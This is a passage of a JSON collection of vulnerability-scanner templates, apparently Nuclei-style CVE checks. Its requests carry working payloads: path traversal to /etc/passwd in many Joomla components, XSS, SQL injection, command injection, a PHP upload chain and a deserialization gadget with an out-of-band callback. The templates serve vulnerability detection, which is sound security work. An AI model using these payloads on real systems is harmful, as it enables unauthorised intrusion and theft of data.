Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-36844","info":{"name":"Juniper Devices - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n","POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n","GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"original_fileName\":","\"converted_fileName\":"],"condition":"and"},{"type":"word","part":"body_3","words":["{{md5(value)}}"]}],"extractors":[{"type":"regex","part":"body_1","name":"phpfile","regex":["([a-f0-9]{64}\\.php)"],"internal":true},{"type":"regex","part":"body_2","name":"inifile","regex":["([a-f0-9]{64}\\.ini)"],"internal":true}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-39141","info":{"name":"Aria2 WebUI - Path traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/../../../../etc/passwd"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Aria2 WebUI\")","regex(\"root:x:0:0:\",body_2)"],"condition":"and"}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET 